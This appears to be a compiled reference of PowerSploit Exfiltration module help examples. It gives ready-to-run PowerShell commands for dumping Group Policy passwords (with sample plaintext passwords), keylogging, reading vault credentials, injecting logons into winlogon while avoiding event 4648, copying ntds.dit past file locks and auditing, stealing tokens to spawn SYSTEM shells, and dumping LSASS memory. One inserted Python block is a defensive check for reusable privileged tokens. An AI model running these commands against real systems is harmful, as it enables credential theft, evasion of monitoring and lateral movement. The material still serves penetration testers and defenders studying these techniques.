PowerSploit Exfiltration Examples Documentation
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration
CommandType Name ModuleName
----------- ---- ----------
Function Get-GPPPassword Exfiltration
Function Get-Keystrokes Exfiltration
Function Get-TimedScreenshot Exfiltration
Function Get-VaultCredential Exfiltration
Function Get-VolumeShadowCopy Exfiltration
Function Invoke-CredentialInjection Exfiltration
Function Invoke-NinjaCopy Exfiltration
Function Invoke-TokenManipulation Exfiltration
Function Mount-VolumeShadowCopy Exfiltration
Function Out-Minidump Exfiltration
-----------
Get-GPPPassword
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-GPPPassword -examples
NAME
Get-GPPPassword
SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed
through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.4.2
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
-------------------------- EXAMPLE 2 --------------------------
PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
-----
Get-Keystrokes
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-Keystrokes -examples
NAME
Get-Keystrokes
SYNOPSIS
Logs keys pressed, time and the active window.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-Keystrokes -LogPath C:\key.log
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Get-Keystrokes -CollectionInterval 20
-----
Get-TimedScreenshot
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-TimedScreenshot -examples
NAME
Get-TimedScreenshot
SYNOPSIS
Takes screenshots at a regular interval and saves them to disk.
PowerSploit Function: Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
-----
Get-VaultCredential
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VaultCredential -examples
NAME
Get-VaultCredential
SYNOPSIS
Displays Windows vault credential objects including cleartext web
credentials.
PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-VaultCredential
-----
Get-VolumeShadowCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VolumeShadowCopy -examples
NAME
Get-VolumeShadowCopy
SYNOPSIS
Lists the device paths of all local volume shadow copies.
PowerSploit Function: Get-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
-----
Invoke-CredentialInjection
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-CredentialInjection -examples
NAME
Invoke-CredentialInjection
SYNOPSIS
This script allows an attacker to create logons with clear-text
credentials without triggering a suspicious Event ID 4648 (Explicit
Credential Logon).
The script either creates a suspended winlogon.exe process running as
SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL into
winlogon.exe which calls LsaLogonUser to create a logon from within
winlogon.exe (which is where it is called from when a user logs in using
RDP or logs on locally). The injected DLL then impersonates the new logon
token with its current thread so that it can be kidnapped using
Invoke-TokenManipulation.
PowerSploit Function: Invoke-CredentialInjection
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon
Creates a new winlogon process (as the SYSTEM account) and creates a logon
from within the process as demo\administrator. The logon will default to
RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -ExistingWinLogon -LogonType NetworkCleartext
Uses an existing winlogon process and creates a logon from within it as
demo\administrator. The logon will be type NetworkCleartext (used in basic
auth and PowerShell w/ CredSSP). Defaults to using the Kerberos provider.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0
Creates a new winlogon process (as the SYSTEM account) and creates a logon
from within the process as demo\administrator. The logon will default to
RemoteInteractive (an RDP logon). The logon will use the Msv1_0 auth
package (NTLM).
-----
Invoke-NinjaCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-NinjaCopy -examples
NAME
Invoke-NinjaCopy
SYNOPSIS
This script can copy files off an NTFS volume by opening a read handle to
the entire volume (such as c:) and parsing the NTFS structures. This
requires you are an administrator of the server. This allows you to bypass
the following protections:
1. Files which are opened by a process and cannot be opened by other
processes, such as the NTDS.dit file or SYSTEM registry hives
2. SACL flag set on a file to alert when the file is opened (I'm not
using a Win32 API to open the file, so Windows has no clue)
3. Bypass DACLs, such as a DACL which only allows SYSTEM to open a
file
If the LocalDestination param is specified, the file will be copied to the
file path specified on the local server (the server the script is being
run from).
If the RemoteDestination param is specified, the file will be copied to
the file path specified on the remote server.
The script works by opening a read handle to the volume (which if logged,
may stand out, but I don't think most people log this and other processes
do it too).
The script then uses NTFS parsing code written by cyb70289 and posted to
CodePlex to parse the NTFS structures. Since the NTFS parsing code is
written in C++, I have compiled the code to a DLL and load it reflectively
into PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see
below for a link to the original script).
Script: Invoke-NinjaCopy.ps1
Author: Joe Bialek, Twitter: @JosephBialek
Contributors: This script has a byte array hardcoded, which contains a DLL
which parses NTFS. This NTFS parsing code was written by cyb70289
<cyb70289@gmail.com>. See the following link:
http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib
The source code is also available with the distribution of this script.
License: GPLv3 or later
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
ReflectivePEInjection version: 1.1
-------------------------- EXAMPLE 1 --------------------------
C:\PS>$NtdsBytes = Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "Server1" -LocalDestination "c:\test\ntds.dit"
Read the file ntds.dit from a remote server and write it to
c:\test\ntds.dit on the local server.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -RemoteDestination "c:\windows\temp\ntds.dit" -ComputerName "Server1"
Read the file ntds.dit from a remote server and copy it to the temp
directory on the remote server.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"
Read the file ntds.dit from the local server and copy it to the temp
directory on the local server.
-----
Invoke-TokenManipulation
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-TokenManipulation -examples
NAME
Invoke-TokenManipulation
SYNOPSIS
This script requires Administrator privileges. It can enumerate the Logon
Tokens available and use them to create new processes. This allows you to
use another user's credentials over the network by creating a process with
their logon token. This will work even with Windows 8.1 LSASS protections.
This functionality is very similar to the incognito tool (with some
differences, and different use goals).
This script can also make the PowerShell thread impersonate another user's
Logon Token. Unfortunately this doesn't work well, because PowerShell
creates new threads to do things, and those threads will use the Primary
token of the PowerShell process (your original token) and not the token
that one thread is impersonating. Because of this, you cannot use thread
impersonation to impersonate a user and then use PowerShell remoting to
connect to another server as that user (it will authenticate using the
primary token of the process, which is your original logon token).
Because of this limitation, the recommended way to use this script is to
use CreateProcess to create a new PowerShell process with another user's
Logon Token, and then use this process to pivot. This works because the
entire process is created using the other user's Logon Token, so it will
use their credentials for the authentication.
IMPORTANT: If you are creating a process, by default this script will
modify the ACL of the current user's desktop to allow full control to
"Everyone". This is done so that the UI of the process is shown. If you do
not need the UI, use the -NoUI flag to prevent the ACL from being modified.
This ACL is not permanent, as in, when the current user logs off the ACL
is cleared. It is still preferable to not modify things unless they need
to be modified though, so I created the NoUI flag. ALSO: When creating a
process, the script will request SeSecurityPrivilege so it can enumerate
and modify the ACL of the desktop. This could show up in logs depending on
the level of monitoring.
PERMISSIONS REQUIRED:
SeSecurityPrivilege: Needed if launching a process with a UI that needs to
be rendered. Using the -NoUI flag blocks this.
SeAssignPrimaryTokenPrivilege: Needed if launching a process while the
script is running in Session 0.
Important differences from incognito:
First of all, you should probably read the incognito white paper to
understand what incognito does. If you use incognito, you'll notice it
differentiates between "Impersonation" and "Delegation" tokens. This is
because incognito can be used in situations where you get remote code
execution against a service which has threads impersonating multiple
users. Incognito can enumerate all tokens available to the service
process, and impersonate them (which might allow you to elevate
privileges). This script must be run as administrator, and because you are
already an administrator, the primary use of this script is for pivoting
without dumping credentials.
In this situation, Impersonation vs Delegation does not matter because an
administrator can turn any token into a primary token (delegation rights).
What does matter is the logon type used to create the logon token. If a
user connects using Network Logon (aka type 3 logon), the computer will
not have any credentials for the user. Since the computer has no
credentials associated with the token, it will not be possible to
authenticate off-box with the token. All other logon types should have
credentials associated with them (such as Interactive logon, Service
logon, Remote interactive logon, etc). Therefore, this script looks for
tokens which were created with desirable logon types (and only displays
them by default).
In a nutshell, instead of worrying about "delegation vs impersonation"
tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon
(good).
PowerSploit Function: Invoke-TokenManipulation
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.11
(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune
Mariboe, https://www.linkedin.com/in/runemariboe)
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-TokenManipulation -Enumerate
Lists all unique usable tokens on the computer.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
Spawns cmd.exe as SYSTEM.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system"
Makes the current PowerShell thread impersonate SYSTEM.
-------------------------- EXAMPLE 4 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500
Spawns cmd.exe using the primary token belonging to process ID 500.
-------------------------- EXAMPLE 5 --------------------------
C:\PS>Invoke-TokenManipulation -ShowAll
Lists all tokens available on the computer, including non-unique tokens
and tokens created using NetworkLogon.
-------------------------- EXAMPLE 6 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500
Spawns cmd.exe using the token belonging to thread ID 500.
-------------------------- EXAMPLE 7 --------------------------
C:\PS>Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output
of Get-Process to the "-Process" parameter of the script.
-------------------------- EXAMPLE 8 --------------------------
C:\PS>(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit()
Spawns cmd.exe using the primary token of LSASS.exe. Then holds the
spawning PowerShell session until that process has exited.
-------------------------- EXAMPLE 9 --------------------------
C:\PS>Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser
Makes the current thread impersonate the lsass security token.
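The synopsis above makes one defensive point worth acting on: a token left by a Network logon (type 3) carries no credentials, while Interactive, Service, RemoteInteractive and the other logon types leave a token that any local administrator can reuse to pivot. The block below is an added example, not part of this gist or of PowerSploit: a hardening check that takes logon records (constructed here with the field names of a Windows 4624 event: Computer, TargetDomainName, TargetUserName, LogonType) and lists on which hosts privileged accounts have left a reusable token, and via which logon types. The logon type numbers are the standard Windows values.

```python
# Added example (not from the gist or PowerSploit): where have privileged
# accounts left reusable tokens? Built on the script's own rule that only
# a Network logon (type 3) leaves a token without credentials.

# Standard Windows logon types (LogonType field of event 4624).
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
               10: "RemoteInteractive", 11: "CachedInteractive"}

def token_reusable(logon_type):
    """The script's rule: everything except Network logon (type 3)."""
    return logon_type != 3

def privileged_exposure(events, privileged):
    """host -> {account -> sorted logon type names that left a reusable token}."""
    exposure = {}
    for ev in events:
        account = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower()
        if account not in privileged or not token_reusable(ev["LogonType"]):
            continue
        host = ev["Computer"].lower()
        name = LOGON_TYPES.get(ev["LogonType"], str(ev["LogonType"]))
        exposure.setdefault(host, {}).setdefault(account, set()).add(name)
    return {h: {a: sorted(t) for a, t in accts.items()}
            for h, accts in exposure.items()}

# Constructed sample records (4624-style fields, made-up hosts/accounts).
SAMPLE_LOGONS = [
    {"Computer": "WKS01.demo.lab", "TargetDomainName": "DEMO",
     "TargetUserName": "Administrator", "LogonType": 10},
    {"Computer": "FILE01.demo.lab", "TargetDomainName": "DEMO",
     "TargetUserName": "Administrator", "LogonType": 3},   # leaves nothing
    {"Computer": "FILE01.demo.lab", "TargetDomainName": "DEMO",
     "TargetUserName": "svc_backup", "LogonType": 5},
    {"Computer": "WKS01.demo.lab", "TargetDomainName": "DEMO",
     "TargetUserName": "jdoe", "LogonType": 2},             # not privileged
    {"Computer": "WKS01.demo.lab", "TargetDomainName": "DEMO",
     "TargetUserName": "Administrator", "LogonType": 2},
]
PRIVILEGED = {"demo\\administrator", "demo\\svc_backup"}

if __name__ == "__main__":
    for host, accts in privileged_exposure(SAMPLE_LOGONS, PRIVILEGED).items():
        print(host, accts)
```

A host that shows a domain admin with a reusable token is exactly the host on which an administrator could run Invoke-TokenManipulation -Enumerate and pivot as that account, which is the argument for keeping tier-0 accounts off workstations and member servers.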
-----
Mount-VolumeShadowCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Mount-VolumeShadowCopy -examples
NAME
Mount-VolumeShadowCopy
SYNOPSIS
Mounts a volume shadow copy.
PowerSploit Function: Mount-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS
Description
-----------
Create a mount point in 'C:\VSS' for each volume shadow copy volume
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Get-WmiObject Win32_ShadowCopy | % { Mount-VolumeShadowCopy -Path C:\VSS -DevicePath $_.DeviceObject }
-----
Out-Minidump
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Out-Minidump -examples
NAME
Out-Minidump
SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.